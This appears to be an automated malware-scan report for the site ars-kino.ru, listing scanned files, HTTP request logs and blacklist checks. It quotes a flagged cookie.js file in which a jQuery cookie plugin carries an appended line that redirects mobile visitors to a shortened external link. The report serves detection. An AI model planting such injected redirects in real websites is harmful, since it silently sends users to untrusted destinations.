Scanned pages/files
Request | Server response | Status |
http://ars-kino.ru/ | 200 OK Content-Length: 77026 Content-Type: text/html | clean |
http://ars-kino.ru/engine/classes/min/index.php?charset=windows-1251&g=general&6 | 200 OK Content-Length: 179945 Content-Type: application/x-javascript | clean |
http://ars-kino.ru/templates/ars-kino/js/cookie.js | 200 OK Content-Length: 2172 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) { var date; if (typeof options.expires == 'number') { dat cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } }; if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location="http://goo.gl/qkqWI"; } Antivirus reports:
| ||
http://ars-kino.ru/engine/classes/js/tabs.js | 200 OK Content-Length: 270 Content-Type: application/x-javascript | clean |
http://ars-kino.ru/umedia.js | 200 OK Content-Length: 6083 Content-Type: application/x-javascript | clean |
http://ars-kino.ru/main/ | 404 Not Found Content-Length: 24858 Content-Type: text/html | clean |
http://ars-kino.ru/index.php?do=feedback | 200 OK Content-Length: 28188 Content-Type: text/html | clean |
http://ars-kino.ru/rss.xml | 200 OK Content-Length: 9061 Content-Type: application/xml | clean |
http://ars-kino.ru/test404page.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://ars-kino.ru/js/jquery/jquery-1.4.4.min.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://ars-kino.ru/js/site_navigation.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://ars-kino.ru/js/ | 404 Not Found Content-Length: 24820 Content-Type: text/html | clean |
http://ars-kino.ru/js/login | 404 Not Found Content-Length: 24779 Content-Type: text/html | clean |
http://ars-kino.ru/index.php?do=register | 200 OK Content-Length: 26922 Content-Type: text/html | clean |
http://ars-kino.ru/login | 404 Not Found Content-Length: 24868 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ars-kino.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 22 Aug 2014 03:14:25 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 77026
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6e8708e9ac6deaa784b933bed7ac6a93; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ars-kino.ru; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ars-kino.ru; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ars-kino.ru; httponly
X-Powered-By: PHP/5.3.28
...77026 bytes of data.
GET / HTTP/1.1
Host: ars-kino.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 22 Aug 2014 03:14:25 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 77026
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6e8708e9ac6deaa784b933bed7ac6a93; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ars-kino.ru; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ars-kino.ru; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ars-kino.ru; httponly
X-Powered-By: PHP/5.3.28
...77026 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ars-kino.ru
Referer: http://www.google.com/search?q=ars-kino.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ars-kino.ru
Referer: http://www.google.com/search?q=ars-kino.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ars-kino.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ars-kino.ru/
Result: ars-kino.ru is not infected or malware details are not published yet.
Result: ars-kino.ru is not infected or malware details are not published yet.